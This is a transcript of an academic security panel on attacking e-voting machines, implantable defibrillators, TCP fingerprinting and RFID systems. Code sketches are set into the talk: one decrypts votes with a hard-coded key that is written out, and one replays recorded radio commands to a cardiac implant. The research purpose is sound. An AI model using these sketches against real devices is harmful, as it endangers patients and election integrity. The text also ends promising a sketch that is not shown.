Okay, well, thank you very much. I appreciate the attendance here for this talk slash panel on hacking in the name of science. Science or hacking: which is better? Which is more important? Or can they work together? I don't know. To start off, a little bit about ourselves. Most of the people here on the panel are scientists, and that means we get to do lots of crazy things and have a lot of fun. Just so you can attach a name to a face: my name is Yoshi. We have Alexei at the very end. We have Dan Halperin right here in the middle. Karl, who is at the end also. And Mike Piatek. And then, to provide the complementary perspective: one of the things we really believe is that scientists shouldn't be working in isolation. We really do need to understand what's going on in the real world. There's a lot of need and opportunity for complementary work between academics, scientists, and everyone here in this audience. And to help provide that perspective is Jon Callas. He's the co-founder and CTO of PGP Corporation and a real internet guru, so I'm glad he's able to join us. So what kinds of things do scientists actually do? Well, when I was in grad school, I spent a lot of time breaking and trying to fix cryptographic protocols. One of them was SSH, which I think everyone here probably knows about. And so, like any good talk, let's start with some definitions. Let X and Y be strings. Then |X| denotes the length of X in bits, and X‖Y denotes the concatenation of X and Y. Okay, this is actually meant as a joke, and the main point of it is that there are lots of aspects of computer security that we're not going to be talking about today. I'm assuming most people in the audience here aren't interested in how to do proofs of security for cryptographic protocols and mathematically analyze them. Instead, some of the work we've done: we did some of the original hacking on electronic voting machines. This is a Diebold voting machine from 2003. You're welcome. We've recently worked on analyzing and experimentally evaluating the security and privacy properties of real implantable medical devices, like implantable defibrillators. We've shown that it's possible to frame printers for copyright infringement and actually get DMCA takedown notices sent to those printers. We've analyzed the privacy properties of the Nike+iPod Sport Kit. We've looked at encrypted multimedia streaming and said, you know what, even though this stream is encrypted, we can do traffic analysis and figure out what you're watching on TV. We've also created, at the University of Washington, a ubiquitous computing environment with RFID readers throughout the building that's able to track all the students in the computer science department. There are interesting issues that arise there, and Karl is going to be talking about that. Yeah, these are real good questions: why are we actually doing that? We're going to try to answer these questions, because what we're hoping to do is provide you a glimpse into what we do in academic security research, and hopefully get your feedback. We recently did some open source laptop tracking software, and new defenses against ghost-and-leech attacks and RFID skimming; I'm going to talk about some of these later. But I think the big question is why we actually do all these things. And the truth is that we love to hack.
We like to break things, we like to build things, and hopefully what we're doing will better society and provide better technology to the people around us. And we love to overcome challenges. If you go through this list, I'm guessing you're probably thinking that these are exactly the things you like to do as well. So in some sense we are all very similar, and I believe that's the case, but I want to give you a perspective on how our approach might be slightly different: the academic perspective. The first thing is that the science really influences our choice of problems. Lots of times when we're sitting in the lab we realize something would be a neat thing to break: this new RFID tag, this smart card, this cell phone application. But some of those things we don't end up doing, because there's not a kernel of science in there, not the academic rigor. What we really try to do is invent new techniques and discover new things, and we have a lot of interest in how to experimentally evaluate the efficacy of our work. One thing to keep in mind is that before, during, and after our technical work, we're always thinking in the back of our heads: how can we publish this work in a peer-reviewed venue? Again, I want to stress that our work only represents a subset of the work done in the academic community. One thing about our goal: we're really not here to compete with the people here and what's being done in industry, but hopefully to complement it. We try to seek out new problems; that's why we sought out electronic voting machines in 2003, and that's why we're seeking out medical devices now. And we also try to apply new twists to classic or old problems, like trying to frame a printer for DMCA takedown notices. So again, why did we put together this talk? It actually started when Jon Callas and I were at another meeting, seeing that the academic security community is doing a lot of great things, and the DEF CON community and industry are doing a lot of great things, but the whole could be much greater than the sum of the parts. So for you, what we're hoping this will do is provide a glimpse of the world of academic security research. And of course I'd also like to encourage you, if you're interested in this, to come to our academic security conferences, like USENIX Security, and maybe even write some of your own academic security papers. And of course we'd love to talk with you more, later in this panel session and also afterwards. For us, we really hope to get your feedback: how can we work better with you? And for all of us, we think that strengthening the bonds, building this superhighway between academics and non-academics, might be a long process, but hopefully many great things will come of it. So let's talk a little bit about some of the hacks we've done. We're going to try to go through these at moderate speed, because we really do want to leave as much time as possible for questions at the end. For background, we're going to talk about attacks that we've done ourselves, because we know the most about them.
We'll provide links to the papers themselves in the slides, which we'll also put online, so you can actually read these academic papers and see how they're structured and what they look like, especially if you're interested in writing some yourself. I've tried to categorize the types of academic security research we do into various bins. The first big bin we focus on is analyzing critical systems. These are systems that I define as being somehow important to society. Oftentimes we try to find critical systems that have been previously understudied, or at least understudied in public. Obviously the three-letter agencies might have looked at these systems in a lot more detail, but these are systems that haven't been publicly studied before. One of the other aspects of our research is that when we write these papers, we can't just break the systems; we have to extract the science from that. So we try to focus on: what are the lessons we learn from these attacks? How can we defend against them? And what are the bigger-picture, societal implications of the attacks we've uncovered? If a paper focuses on attacks only, it's very often hard to get it accepted at a peer-reviewed venue. By the way, since this is hoping to have some sort of interaction, please do feel free to interrupt as we go through the talk. The first work I'm going to talk about is our analysis of an electronic voting machine, which we did with some folks at Johns Hopkins and Rice University. If you're not from this country, or haven't been paying attention to the news for the past two centuries, you might not know that voting is a cornerstone of our democracy. It allows us to influence many things: crime prevention, healthcare, education, foreign policy, and whatnot. In fact, US citizens have fought very long and hard for the right to vote, beginning with the Declaration of Independence in 1776, moving on to the 15th and 19th Amendments, and then poll taxes becoming illegal in 1966. Now fast forward to the 2000 presidential election. You probably all remember the debacle that happened in Florida, with the hanging chads and the butterfly ballots, and the countless hours spent looking at those ballots trying to figure out who actually voted for whom. In response, there was a big push toward modernizing our elections, and in particular toward electronic voting machines. If we look at the state of the world prior to 2003, there were some computer scientists concerned about the security and privacy properties of these voting machines, but it was very hard for them to analyze the systems and argue concretely, and so their concerns were often ignored by politicians and others. But then something magical happened in 2003: the Diebold source code (I'm sorry, we've had problems with the VGA monitor, so I know this is kind of hard to read) was found by Bev Harris on Diebold's anonymous FTP site and was reposted to the web, providing the first opportunity for the public to analyze the security and privacy of a real electronic voting machine. Being scientists, when we found this opportunity, the first thing we did was jump on it. And so we analyzed this system.
For those of you who aren't familiar with how the system works, here's a brief overview, which we pieced together by reverse engineering. Here's the electronic voting machine. Before the election, a poll worker comes in and loads what's called the ballot definition file onto the machine. This controls how the ballot is presented to the voter: who the candidates are, what the different pieces of the election are. Then the voter shows up, and the poll worker gives the voter a smart card, which allows the voter to interactively vote. When the voter has finished selecting Mickey Mouse or Donald Duck, the vote is encrypted and written to some sort of storage, and at the end of the day the votes are transmitted to a back-end tabulation center. So this is how the system works, and to most people this sounds all well and good: a great voting system that will improve our democracy and overcome all the problems from the 2000 presidential election in Florida. It turns out it's not so simple. Of course, an attacker could modify the software running on these voting machines; but for the purposes of the rest of this piece, let's assume the software running on these machines is exactly what we studied, and see what might go wrong. In the software we studied, we found that the ballot definition file wasn't authenticated in any way. That means a bad person could replace the ballot definition file with one that would swap votes: when a user went up and said, I want to vote for Mickey Mouse, the vote would actually be recorded for Donald Duck, and vice versa. Of course that could be used to modify the results of the election. We found that there was also no authentication between the smart card and the voting terminal, so a malicious voter could manufacture their own smart cards and (sorry, this thing is not keeping up to date) vote multiple times. We also found, and remember I mentioned that when you record your vote it's supposed to be encrypted and stored on a compact flash card, that the encryption was done with a hard-coded key. In fact, the same key had been used since at least 1998, and probably before that. What this means is that if a poll worker is malicious, they can take these encrypted votes, just decrypt them, and figure out who voted for whom. And some other interesting issues: remember I mentioned that at the end of the day the votes are sent to a tabulation authority. This machine had the ability to send votes over a wireless or internet connection, or a dial-up connection, or you could manually carry the physical media. But it turns out that if the votes were being sent over a wireless connection, the machine would take the votes, decrypt them, and then send them in clear text over the connection to the tabulation center. So (oops) clearly, that's a bit undesirable.
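To make that hard-coded-key problem concrete, here's a minimal sketch of what decryption looks like once the key is public knowledge. It assumes single DES in CBC mode under the key that appeared in the leaked source; the vote file name and the IV-then-ciphertext layout are placeholders for illustration, not the machine's actual file format.

```python
# A minimal sketch, assuming DES-CBC under the hard-coded key; the file
# name and the IV-then-ciphertext layout are illustrative assumptions.
from Crypto.Cipher import DES  # pip install pycryptodome

HARDCODED_KEY = b"F2654hD4"    # the same key, on every machine, for years

def decrypt_votes(path: str) -> bytes:
    """Anyone who has read the leaked source can decrypt any vote file."""
    with open(path, "rb") as f:
        blob = f.read()
    iv, ciphertext = blob[:8], blob[8:]  # assumed layout
    return DES.new(HARDCODED_KEY, DES.MODE_CBC, iv).decrypt(ciphertext)

if __name__ == "__main__":
    print(decrypt_votes("votes.enc")[:64])  # "votes.enc" is a placeholder
```

The point is that there's no key management to attack at all: once one copy of the source leaks, every machine's "encrypted" votes are readable.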
Like I said, we spent a lot of time looking at the source code, and we found some interesting comments in there, like "this is a bit of a hack for now." This one is particularly confusing, because I'm not actually sure what it means for key handling to be gorped: "The BOOL beep flag is a hack so it doesn't beep twice. This is a result of the key handling being gorped." That doesn't really give me much confidence in the system, if the other things weren't enough. And other "gross hacks" and "double faults"; I don't know if they were playing tennis while they were coding this or not. These are things that probably many of you doing security in industry have already seen. Many comments we receive are like: "the correctness of the software has been proven through an extensive testing process." How many people in here believe that? Or how many people do not believe that? Yeah. Other comments we've often received: these machines have never been attacked in the past, so we know they won't be attacked in the future. Not having security mechanisms built into the software is okay, since election procedures would detect any malicious activity. And of course, people said the code we analyzed was old, and so none of our results apply anymore. If you've been following the media since 2003, you know that this is not the case. There are a large number of subsequent results that basically confirmed our findings; some actually implemented the attacks we found, and there have been many, many more results analyzing more recent versions of these systems: great work from the Princeton team, the California top-to-bottom review, the EVEREST team, and others. One of the things academics do when they analyze these systems is that we don't just say, okay, we've analyzed them, we've found lots of problems, this is great, let's move on to the next topic. There's a lot of follow-through that needs to happen. There's now a whole research community focused on improving the security of electronic voting machines, and improving electronic voting in general (I'm facing this way because the mic is in kind of an odd location): improving the usability, improving all aspects of electronic voting. There's actually a new workshop, which just met a week or two ago, focusing on electronic voting technologies. The next slides are derived from slides presented by Debra Bowen, the Secretary of State of California, at that USENIX workshop. The first said: to prevent unwanted presidencies, Americans must bring back hand-counted paper ballots. You've probably heard that many computer scientists are saying that in the short term, since we have all these security problems, we really need paper ballots. And this is the bumper sticker that she displayed; the next slide is the bumper sticker that she, or someone else, saw on a real car in Texas. Maybe you'll see this bumper sticker here at DEF CON next year. And with that, Alexei will be talking about... oh sorry, with that, Dan will be talking about our security analysis of another system we believe to be critical. So hi, I'm Dan, and I'm going to be talking about a paper we presented at the Oakland security conference earlier this year about pacemakers and implantable cardiac defibrillators. This is joint work with a bunch of colleagues at UMass Amherst, and also a cardiologist and FDA-involved doctor named Dr. Maisel, who's from Harvard Medical School. Okay, so, wow. So this talk is about implantable medical devices.
I want to give you a few examples of implantable medical devices. An implantable drug pump would be used to treat chronic conditions: people with diabetes might have an insulin pump implanted so they don't have to give themselves shots all the time, or a morphine pump for people with chronic pain. Prosthetic limbs, you know what those do. Neurostimulators deliver shocks to the brain to treat conditions like Parkinson's; they've actually been remarkably effective, causing huge life-changing improvements for victims of these diseases. And then of course there are cardiac devices like pacemakers and implantable cardiac defibrillators, which we'll be talking about in this talk. Some facts about these devices, which I'm going to start calling IMDs for short: they're very common. One statistic is that there were 2.6 million pacemakers implanted between 1990 and 2002 in the US alone; that's about 200,000 a year. These devices are computers. They have very sophisticated functionality, and they perform vital, life-sustaining functions inside of people. In performing that functionality, they provide dramatic quality-of-life improvements, and sometimes just life improvements, for the people they treat. One thing that's particularly interesting about these devices is that the modern versions are wirelessly programmable. Here's an instance of such a device: a wirelessly adjustable, implantable vasectomy device. A quote from the founder of the team that developed it says, it'll be like turning a TV on and off with a remote control, except that, thankfully, the remote will be locked away in your doctor's office to safeguard against any accidental pregnancy or potential misuse. Now, I'm sure we all know that proprietary remote controls work perfectly. You could never, for instance, modify a TV remote to control trains. So in reality, this is not just a talk about implantable medical devices; it's a talk about implantable medical device security. So why would we study IMDs? Well, security and privacy are really critical for these devices, and the medical domain is actually a brand-new problem domain, and as a consequence there are new challenges and new opportunities. On the other hand, experience, for example with e-voting as Yoshi talked about, really seems to imply that the medical industry alone isn't going to develop the right solutions; they need our help to do the right thing. And one thing I'd like to underscore here is that securing IMDs is actually a really hard problem. The devices we looked at are implantable cardiac defibrillators, or ICDs. These devices are very similar to pacemakers: they monitor your heart waveforms, and they can set the heart rhythm for a heart that beats irregularly. They have one more function, which is that they can treat fibrillation, when the heart enters an unstable, kind of fluttering state, a potentially fatal heart condition; the device can deliver a large shock to re-synchronize the heart in these cases. So how do you actually implant these things? Well, the first thing is, while the pacemaker is still out of the body, the doctor sets the patient info on the device, and to do this he uses something called a device programmer. That's what's pictured here.
Then the doctor surgically implants the device, but once the device has been put into place, the doctor needs to know that it's working. Think about this for a minute: how are you going to test something that's designed to help a patient recover from potentially fatal heart conditions? Well, you do the obvious thing, which is you actually cause a fatal heart condition. So the doctor configures the device to provide the proper treatment, and then invokes a test mode on the ICD itself that can put the heart into fibrillation, and hopefully the device will respond. In this case, doctors are standing by with the appropriate defibrillation equipment in case the device doesn't work. After this, the patient can leave and go home, and at home there's often ongoing monitoring: these devices will talk wirelessly to some monitor sitting in the corner of the room, which uploads data over the internet or a dial-up connection. (The security of those monitors is outside the scope of this work.) The point is that this provides continual diagnosis of the patient for the doctor, without office visits, that kind of thing. So this is really convenient for the patient. Now, if you start thinking about how to attack this system, what would be the first thing you do? You might think about stealing a device programmer. You could be an insider at the hospital, a doctor or a nurse who has access to these things. You could steal one; maybe you could buy one. Those of you with laptops might want to check eBay and see if there's anything out there you can get right now. Once they have one of these devices, a thief can reverse engineer it and modify it. And what we found is that the ICD will trust any device that speaks the protocol: there's no cryptographic key material or authentication used in securing these communications. So the risk here is that you get root on basically every implant if you have one of these devices. The ICD's trust base is way too large. On the other hand, these things are pretty large and clunky to carry around; maybe what you should do is build one of your own. And this is what we did. We used the USRP software radio, which is pretty cheap; we ended up with maybe a thousand dollars' worth of hardware to build this thing. We can mimic the behavior of the legitimate programmer with this ICD, in a much smaller form factor. So this is pretty nice. So what kinds of things can you do? Well, you can easily eavesdrop on private information. Here is a printout of a trace of the kind of data sent in the clear by these devices during normal communications. You see things like the diagnosis of the patient, the patient history, the reason why they have the ICD. You see the hospital where it was implanted; you see the doctor and his contact information. And there's a whole bunch of other things you learn, such as the current device state, the patient name, the date of birth, make and model, the serial number, and a whole bunch more. Not only can you eavesdrop on information stored inside the device; the device actually emits a continuous EKG when it's in communications mode, so you can just sniff the patient's vital signs while it's active. There may not be an obvious fatal attack from this, but vital signs can still say a lot about a person and can be used as an interesting side channel for information about the patient. So then we thought: okay, we can eavesdrop and learn a lot of information from these devices, but we can also do a bunch of simple replay attacks. It turns out that when the programmer and the implant talk, the conversation is the same every time for the same operation. What this means is that we can mount replay attacks where all we do is retransmit the same commands the programmer would send, and we realize the same effect.
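Here's a minimal sketch of that replay idea, assuming you've already recorded the programmer's transmission as raw I/Q samples with a software radio. The file name, sample rate, and the `sink` transmit object are hypothetical stand-ins for whatever your SDR toolchain provides; the point is just that, with no nonces or freshness in the protocol, bit-for-bit retransmission is enough.

```python
# A sketch of capture-and-replay, not the actual attack code. The capture
# file, sample rate, and transmit sink are hypothetical placeholders.
import numpy as np

SAMPLE_RATE = 500_000  # Hz; assumed capture rate

def load_capture(path: str) -> np.ndarray:
    """Load interleaved float32 I/Q samples recorded from the programmer."""
    raw = np.fromfile(path, dtype=np.float32)
    return raw[0::2] + 1j * raw[1::2]  # recombine into complex baseband

def replay(samples: np.ndarray, sink) -> None:
    """Retransmit the recorded waveform unchanged; with no nonces or
    timestamps in the protocol, the implant accepts the stale command."""
    sink.write(samples)  # 'sink' stands in for your radio's TX stream

if __name__ == "__main__":
    cmd = load_capture("programmer_command.iq")  # hypothetical capture
    # replay(cmd, tx)  # wire 'tx' up to your SDR's transmit API
```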
Now, some caveats here: the risk to patients today is extremely small. These devices only work at very close range, we only tested one ICD model, and we didn't make any effort to maximize the range or speed up the attacks, which currently take seconds to minutes to perform. But the kinds of things you can do are: you can drain the device battery; you can disable all therapies quietly, without the patient knowing (normally there'd be a warning if you, as a doctor, used the programmer to do this); and then, if you remember that test mode we talked about earlier, you can actually induce fibrillation, which, now that you've disabled the therapies, the implant will ignore. You can think about how this plays out for other kinds of implants: you can do things like flood the patient with drugs, overstimulate nerves, April Fools, you're pregnant. The point is that these kinds of attacks can put patient safety and well-being at risk. And just to drive home the point (yes, we think that right now these attacks are mostly academic and would be really hard to mount): the idea of attacks on medical systems is not new. You may remember that in November of last year, people started posting animated pictures on web forums that were designed to trigger seizures in viewers with photosensitive epilepsy. This actually happened in 2007, and one of the site administrators said, look, this is just a bunch of very immature people delighting in their attempts to cause people misery; attacking is just a way to pass the time for them. What this means is that these attacks can happen. Not only that, but the same attack happened again in March of this year. So the take-home there is that bad people do exist. These systems are getting really complicated, they're getting really powerful, and they're doing a great deal of good. So we need to make sure they're secure now, before the ability to mount attacks becomes even easier. I think that epilepsy is kind of a good indicator of what's down the road, because these epilepsy patients have a very large attack surface; right now, for most implantables, the attack surface is very small, and that's why we want to get started on this problem now. So now Yoshi's going to talk about the next class of attacks we worked on. Thank you. So thank you, Dan. Just to summarize: from the voting work that we did five years ago and the medical device work we're doing now, the reason we're focusing on these as academics is that we're really trying to ask what technology is going to be like in five or ten years, and what new security and privacy issues are going to arise with it. We're really trying to address tomorrow's problems with this type of work, rather than today's problems.
You can think about how these medical devices, as Dan mentioned, are evolving amazingly fast. If the devices in 10 or 15 years have the same security and privacy properties that today's devices do, you can only imagine what the risks might be. I might also mention, just as something for you to think about, that sometimes the patients themselves may be the adversaries: Dan already mentioned the vasectomy implant, and you can also think about an implanted morphine pump and who might want to attack that. Okay, but in any case, let's move on to the next class of attacks, and I think this is something many of you in the audience are also familiar with: discovering some kind of new exploit, some new way of attacking a system. When academics discover a new way of attacking a system, one thing we try to do is push it as far as we can (and I'm not saying you don't do this as well; I'm just trying to describe the academic perspective) in terms of measuring the efficacy of the attack. What's the vulnerable population like? How does this attack really work, what can we do to make it even better, and of course, how do we defend against it? To make this discussion a little concrete, I want to talk about some work we did on remote physical device fingerprinting. Here are the goals someone might have: to distinguish between two devices that have the same hardware and software configuration. You might be sniffing network traffic, or you might be actively communicating with these two devices, and you want to know: are these the same device, or different devices? Or maybe your question is: is this a real machine? I'm remotely talking to a machine I don't have physical access to, and I want to know whether it's a real machine or not. Or maybe I have a collection of network traces that someone posted online and anonymized, and I want to de-anonymize them. Prior to our work, there were a number of existing tools one might use: for example, operating system fingerprinting, looking at usage characteristics, or, for some threat models, actually compromising the device and putting some malware or cookies on it. In our research, we discovered a new technique, which we call remote physical device fingerprinting, that works on some information leakage in the TCP and ICMP protocols. Here's a little screenshot of a tcpdump; you can see there are three packet headers in here. The field we're most interested in is the TCP timestamps option. This field is defined, from the RFC, as follows: the timestamp value to be sent in each outgoing packet is to be obtained from a virtual clock that we call the timestamp clock, and its values must be at least approximately proportional to real time. So that's this field here. And highlighted in green is the time the recorder thinks it is when it captures the packet. Now, as many of you know, clocks have skew: some computers think time is passing a little bit faster than it really is, and some a little bit slower. It turns out we can use the deviation of a machine's TCP timestamp clock over time: if you look at how the TCP timestamp option values in packets you've captured drift relative to your own clock, you can fingerprint machines, with some probability of error.
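To give a feel for how simple the core measurement is, here's a small sketch using scapy and numpy. It assumes you have a pcap of the target's traffic and that the target sends the TCP timestamp option; the file name and the 100 Hz timestamp clock rate are assumptions (in the real work, the clock frequency has to be estimated too, and the paper fits the skew with linear programming rather than the least-squares fit shown here).

```python
# A minimal sketch of clock-skew fingerprinting, assuming a pcap of the
# target's traffic; "capture.pcap" and the 100 Hz clock are assumptions.
import numpy as np
from scapy.all import rdpcap, TCP

HZ = 100.0  # assumed frequency of the remote TCP timestamp clock

obs = []
for p in rdpcap("capture.pcap"):
    if TCP in p:
        for name, val in p[TCP].options:
            if name == "Timestamp":
                tsval, _tsecr = val
                obs.append((float(p.time), tsval / HZ))

t0, v0 = obs[0]
x = np.array([t - t0 for t, _ in obs])      # elapsed time on our clock
y = np.array([v - v0 for _, v in obs]) - x  # remote clock offset vs ours
skew_ppm = np.polyfit(x, y, 1)[0] * 1e6     # slope of the drift, in ppm
print(f"estimated clock skew: {skew_ppm:.1f} ppm")
```

Two hosts whose drift lines have different slopes have physically different clocks, even when everything else about the machines looks identical.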
Here's a screenshot of an example where we collected packets from 69 machines in an undergraduate laboratory, all with the same hardware and software configuration, and plotted the difference between their reported time and our reported time, as a function of time on the horizontal axis. As you can clearly see, some machines are very easily distinguishable from the others. We thought this was kind of a neat observation. Clearly it's not going to uniquely fingerprint every single machine out there, but it can be combined with other techniques for additional information. What made this an academic study is that we wanted to dive deeper and ask: what operating systems does this apply to? How stable are these measurements over time, over days? How stable are these measurements for the same laptop connected from different locations throughout the US, through different access technologies? Does this vary with the topology between the measurer and the devices being measured? We had to run a whole bunch of experiments to really understand how effective this technique was. And if you're doing this type of research yourself, finding new attacks and wanting to understand them, and maybe wanting to publish at an academic venue, then this paper, and plenty of other good papers out there, are worth looking at. Again, some simple applications of this: with some probability of error, we can track individual machines as they connect from different points on the internet. We used this to de-anonymize anonymized network traces that were being made available to other researchers. And we actually used this to distinguish between two virtual machines running on the same physical machine and two different real machines. Some interesting observations come out of publishing this type of work; I'm sure people here have gotten similar things. You get lots of emails. We received lots of emails from people saying they've lost their laptops: can you help find them? It turns out this technique wasn't quite designed for that, unless we actually instrumented the ISPs to do this type of monitoring, and even then it would be a long shot. But I'm actually showing these slides for a reason, and I'll get back to that in a minute. With that, I want to talk about the next type of research we do in academic computer security, at least at the University of Washington, and that's building new systems. We try to build new systems, and then, of course, evaluate those systems, for solving both new and old problems.
One of the things we really try to do is build systems that we think might exist in 10 or 15 years, systems that don't yet have the security and privacy properties we'd want, and then try to retrofit them and see how we would address those properties, so that we can better anticipate and guard against privacy and security invasions in the future. So with that, I want to introduce Karl, who's going to talk about some work on what's called the RFID Ecosystem. All right, thanks, Yoshi. Today I'm going to talk about privacy and the RFID Ecosystem at the University of Washington. There are a ton of people involved; I couldn't fit all their names on this slide, there are like 27 other collaborators. The RFID landscape today consists of proximity cards, credit cards, toll transponders, supply chain applications where you have tags on pallets of items, and passports. And there are some other niche applications, like cattle tagging, stuff like that. But what's projected to happen in the future is that we'll have tags on absolutely everything: your clothes, possibly money, everything you carry around with you. So what we want to do is assume that RFID will become pervasive, and before that happens, figure out both what cool applications this pervasive technology enables, and what privacy and security issues arise. There's an important privacy-utility trade-off here: we need to look at databases, applications, and so forth to see if RFID can actually be useful. But for this talk, I'm only going to cover the privacy and security issues. Next I'm going to show a short video of a potential future of RFID that we want to work hard to avoid. So this is a video. Oh, let's see here, how do I activate this? It should actually be already activated. You just don't see it on this. Oh, I don't see it, okay. Ha ha, cool. All right. What we're doing here is a demo of tracking a student around the building. We have a Google Maps interface showing his exact position in the building. We have a bunch of RFID antennas on top of the cable tray there. It's sort of hard to see, but there's a purple icon that keeps moving around the map. We have 185-plus antennas deployed in the building and 40-plus readers; they cover all the floors, and we're deploying more. This is different from cell phones in that anyone can track these tags, not just the carriers or people who have access to the carriers. What I'm showing here is for demo purposes only; the actual study respects people's privacy, and we have a huge informed-consent process that's been reviewed by the human subjects board and so on. But what I'm showing here is how feasible it is to quickly track a person; he's coming back over here by the security lab, read by the next reader, and let's see. Oh, there he is at the door, coming in. So it's clear that violating your privacy is easy. Now here's the hard part: how do we fix that? There are many privacy issues involved. There's institutional surveillance. There's rogue surveillance. Even if you fix the surveillance problems and you can say who you want to be able to read your tags, you have the problem of setting access controls right. You can still game the system in certain cases, and we have found some unintended consequences of privacy controls.
The first is institutional surveillance, which is pretty much what I just showed: whoever owns the RFID infrastructure can basically track anything that goes through it. Some might wonder, is this a real threat? Well, we found a newspaper article recently noting that workers snooping on customer data is pretty common. There's a lot of interest among companies in tracking customers via their cell phones; there's a company using software radios to track people through malls by their cell phone transmissions. There are customer loyalty cards and so forth. And then there's this: companies are also interested in finding out what their employees are doing, and if you have an RFID employee badge, it seems feasible that in the future they can figure out exactly where you are. Then there's rogue surveillance. The industry is rallying behind a common protocol, EPC Gen 2. Class 1 Gen 2 tags have essentially no security features; anyone with a Gen 2 reader can read a tag, potentially from far away. Down one of those hallways, we placed an antenna and held a tag out at the other end. We got to 160 feet, and then we hit the window and couldn't go any further. And that was using completely commercial off-the-shelf readers and antennas; we didn't jack the power beyond legal limits or anything. The other interesting thing is that Washington has been deploying this enhanced driver's license, completely optional, to facilitate border crossing into Canada. That also uses an EPC Gen 2 tag. I put one in my wallet, I walked down the hallway, and I could easily track myself, as could anyone else I give access to that data. Speaking of how I give people access to that data: it's really hard to get access control policies right. It's time consuming even for experts. One of the things we're thinking about doing is reusing existing social networks; we have a Facebook application that one of the undergrads is developing. The other thing we've been thinking about is what a usable default should be. One thing we've experimented with is something called physical access control. The idea is that you have access to exactly the tag reads that you could have physically seen. The advantage is that it's a simple mental model for people to think about, and a very restrictive level of access, while still being usable. Of course it has some quirks; for example, it assumes 360-degree vision, and you can potentially read tags through walls. And there are a few problems with it. One: the way we tell where you are is that you have a person tag. I am tagged right now, with an EPC Gen 2 RFID tag. Now, there's no reason why I have to keep this with me. I could, for example, put it in the break room and see whenever someone enters the break room. There's no reason why you can't clone it. And in fact, there's no reason why I can't take my tag, slip it into someone's bag, and now I can track exactly where they go. These tags can be very easy to hide. A big challenge is to figure out how we can mitigate that attack while still keeping the system usable.
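Here's a toy sketch of that physical access control default, just to make the policy concrete. The data layout and the ten-second co-location window are assumptions for illustration; the real system is, of course, more involved.

```python
# A toy sketch of physical access control: you may see a tag read only if
# your own badge was seen by the same antenna at roughly the same time,
# i.e., only events you could have physically witnessed. The data layout
# and the 10-second window are illustration-only assumptions.
from dataclasses import dataclass

@dataclass(frozen=True)
class TagRead:
    tag_id: str
    antenna: str  # which antenna saw the tag
    t: float      # time of the read, seconds since epoch

def visible_reads(all_reads, requester_tag, window=10.0):
    """Return only the reads the requester could have seen in person."""
    mine = [r for r in all_reads if r.tag_id == requester_tag]
    return [
        r for r in all_reads
        if any(m.antenna == r.antenna and abs(m.t - r.t) <= window
               for m in mine)
    ]
```

Notice how the person-tag attacks mentioned above map directly onto this: if someone plants or clones your tag, the `mine` set lies about where you were, and the policy grants them your view of the world.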
And even if we get some of these issues resolved, there are still unintended consequences. One of the undergrad projects we had running was a friend-finder application, and one of the privacy models we explored there was: what if you were notified whenever someone queried for your location? Well, this now tells you personal information about the querier, because they may not want you to know that they've been asking for your location. And this turned out to have an interesting side effect. There was a group of three girls who implemented this, and one of them didn't have her location queried by the other group members very often. She felt, I don't know, somewhat betrayed; it was a weird social dynamic. So there are some unintended consequences there. And staying on the RFID subject, I'm going to turn it over to Alexei, who will be talking about another project I worked on. He'll tell you more about that. Hi everyone, I'm Alexei. I'll be talking to you about secret handshakes, but not in the standard sense you're thinking of. So, like Karl said, RFIDs are everywhere, right? They're in credit cards, so you can get your burger faster. They're in access control cards, like this HID prox card. And what does this mean? Well, it means we get cool new attacks to try out. There are lots of them, like skimming attacks, where you get next to someone and just copy their card, and so on and so forth. But one of the more sinister attacks people are talking about nowadays is called the ghost-and-leech attack. The usual scenario for these cards is on the order of four inches: you come up to the reader, you pull your wallet out, you stick it next to the reader, it authenticates, you complete your purchase, and so on and so forth. With this attack, you extend that authentication distance, potentially to a very long distance, by having one guy next to the card. For example, if you're in a cafe, he can be sitting next to you, and he can have a buddy next to some secret door that you have access to, and they just proxy the communication between the tag and the door. This works really well because they don't even have to look at whatever fancy crypto is implemented; they just forward the messages back and forth. Okay, so we're scientists, so we want to try to defend against this, right? Yeah, science. We want to avoid changing the usage model, because it would be pretty annoying if I had to take my card out of my wallet every single time I wanted to do something. We want to modify just the tags. We want to continue using completely passive tags, ones without a battery. And we don't want to change the back-end systems, because it would really suck to have to replace all the readers and all the infrastructure behind them. So how would you go about doing this? Well, you make the fundamental observation that this attack only works because the tag is promiscuous: it replies any time it's queried by a reader, whether the user wants it to or not. And then you make this observation: the motion you make with the tag when you try to authenticate is different from when it's just sitting in your pocket while you do everyday things. So what if we make the card smart, so it actually recognizes this gesture? If we can do that, then we can limit transmission to only the contexts in which the card would actually be doing something legitimate, like authenticating, okay? It turns out that people authenticate in different ways: somebody slaps their card against the reader, other people do a wave, other people do a little hip swing.
Dan here says he actually jumps at the reader, because it's not waist-high for him. Anyway, we decided to try to standardize this a little and call these gestures secret handshakes. For example, we can have specific predefined gestures, like here you see the 1.5 wave, which is this. The card can recognize the gesture and be activated by it. So does this really work? Well, apparently it does. We tried three people and 150 tries, and it worked every single time. We also put the card in a pocket and did random activities: riding a bicycle, playing ping pong (it's always great when you can play ping pong and call it research), walking the hallways, things like that. It turned out to have zero false positives. Now, this was three hours of data, not three years, so this is kind of preliminary, but still, it works; pretty cool. We're not the first to try to shield the card from transmitting. There are these sleeves, which apparently don't work too well if they have even a small opening; they're supposed to shield your card from RF. You could also have a tinfoil hat for your wallet; stylish, maybe. But that doesn't really maintain the same usage model, because now you not only have to take your wallet out of your pocket, and not only take the card out of your wallet, but you also have to take the card out of the freaking shield. So this isn't very convenient. You can also put buttons on these things, except buttons are prone to being pressed in tight conditions, like inside a wallet. So that's not good either. Here's a little glimpse of how we did this. I'm not going to give all the details right now because we don't have that much time, but if you want to meet up with me afterwards, I can tell you more. We used a completely passive 900 MHz EPC Gen 1 RFID device from Intel called a WISP, the Wireless Identification and Sensing Platform. It's that little chip you see in the middle of the black plastic case; all the wires, except for the two big yellow ones, are debug wires. Basically, it harvests RF power, stores it in a capacitor, and has a microcontroller on board, and when it has enough power it can actually do some computation, which is pretty cool. This one also has an accelerometer on it, but you can put other sensors on it as well: a capacitance sensor, a light sensor, things like that. You can use this same technique to do other tricks. For example, we talked to a woman who was riding a subway system somewhere in Europe; it's more advanced than here, because you scan your contactless card on the way in, and you scan it on the way out at some other station, and it charges you for the distance you traveled. She had two cards in her wallet, and apparently one got charged on the way in and the other got charged on the way out, and she was stuck in the subway for half an hour trying to figure out what was going on, until the police came. What you can do now with this is have a different handshake for each card: for one card you do a triangle, for another you do a square, for another you do the wave. There's a sketch of what the gesture-recognition loop might look like below.
